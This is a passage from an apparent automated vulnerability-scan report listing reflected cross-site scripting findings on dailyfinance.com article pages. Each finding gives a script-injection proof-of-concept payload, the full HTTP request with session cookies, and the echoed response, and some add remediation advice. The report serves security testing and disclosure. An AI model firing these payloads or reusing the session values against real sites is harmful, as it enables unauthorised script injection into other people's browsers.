GET /story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/?6223c"-alert(1)-"3957c211126=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.426. http://www.dailyfinance.com/story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4d8"><script>alert(1)</script>2a26450345b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/?5d4d8"><script>alert(1)</script>2a26450345b=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/?5d4d8"><script>alert(1)</script>2a26450345b=1" rel="nofollow"> ...[SNIP]...
1.427. http://www.dailyfinance.com/story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd06b"-alert(1)-"4fd5929ab55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/?cd06b"-alert(1)-"4fd5929ab55=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.428. http://www.dailyfinance.com/story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcd53"><script>alert(1)</script>5a920242a3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/?dcd53"><script>alert(1)</script>5a920242a3e=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/?dcd53"><script>alert(1)</script>5a920242a3e=1" rel="nofollow"> ...[SNIP]...
1.429. http://www.dailyfinance.com/story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 174e8"-alert(1)-"be68957430 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/?174e8"-alert(1)-"be68957430=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.cr ...[SNIP]...
1.430. http://www.dailyfinance.com/story/investing-basics/investing-rules-tips-children-kids/19829360/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a9a2"-alert(1)-"25304f24b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing-basics/investing-rules-tips-children-kids/19829360/?7a9a2"-alert(1)-"25304f24b1b=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createE ...[SNIP]...
1.431. http://www.dailyfinance.com/story/investing-basics/investing-rules-tips-children-kids/19829360/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c75d9"><script>alert(1)</script>2ce639e60d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing-basics/investing-rules-tips-children-kids/19829360/?c75d9"><script>alert(1)</script>2ce639e60d4=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing-basics/investing-rules-tips-children-kids/19829360/?c75d9"><script>alert(1)</script>2ce639e60d4=1" rel="nofollow"> ...[SNIP]...
1.432. http://www.dailyfinance.com/story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc82b"-alert(1)-"431b8775d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/?cc82b"-alert(1)-"431b8775d3d=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.crea ...[SNIP]...
1.433. http://www.dailyfinance.com/story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac77"><script>alert(1)</script>9840934c28d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/?6ac77"><script>alert(1)</script>9840934c28d=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/?6ac77"><script>alert(1)</script>9840934c28d=1" rel="nofollow"> ...[SNIP]...
1.434. http://www.dailyfinance.com/story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f26c6"><script>alert(1)</script>c5b1d4d7c67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/?f26c6"><script>alert(1)</script>c5b1d4d7c67=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/?f26c6"><script>alert(1)</script>c5b1d4d7c67=1" rel="nofollow"> ...[SNIP]...
1.435. http://www.dailyfinance.com/story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1246"-alert(1)-"2015a39cfd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/?b1246"-alert(1)-"2015a39cfd6=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.creat ...[SNIP]...
1.436. http://www.dailyfinance.com/story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 756c3"-alert(1)-"561280b8fde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/?756c3"-alert(1)-"561280b8fde=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.creat ...[SNIP]...
1.437. http://www.dailyfinance.com/story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 402a9"><script>alert(1)</script>a1893e49980 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/?402a9"><script>alert(1)</script>a1893e49980=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/?402a9"><script>alert(1)</script>a1893e49980=1" rel="nofollow"> ...[SNIP]...
1.438. http://www.dailyfinance.com/story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8028"><script>alert(1)</script>92c563ca472 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/?e8028"><script>alert(1)</script>92c563ca472=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/?e8028"><script>alert(1)</script>92c563ca472=1" rel="nofollow"> ...[SNIP]...
1.439. http://www.dailyfinance.com/story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6290a"-alert(1)-"2d9c30fe247 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/?6290a"-alert(1)-"2d9c30fe247=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.440. http://www.dailyfinance.com/story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a9e"><script>alert(1)</script>ebc8dfd08f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/?c1a9e"><script>alert(1)</script>ebc8dfd08f0=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/?c1a9e"><script>alert(1)</script>ebc8dfd08f0=1" rel="nofollow"> ...[SNIP]...
1.441. http://www.dailyfinance.com/story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5aa4f"-alert(1)-"d7347c308ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/?5aa4f"-alert(1)-"d7347c308ff=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.442. http://www.dailyfinance.com/story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90dd5"-alert(1)-"48bede31c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/?90dd5"-alert(1)-"48bede31c=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.443. http://www.dailyfinance.com/story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fea7"><script>alert(1)</script>a40d3729cf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/?5fea7"><script>alert(1)</script>a40d3729cf6=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/?5fea7"><script>alert(1)</script>a40d3729cf6=1" rel="nofollow"> ...[SNIP]...
1.444. http://www.dailyfinance.com/story/investing/why-global-food-price-inflation-really-matters/19827378/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b125"-alert(1)-"66d1000cc3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
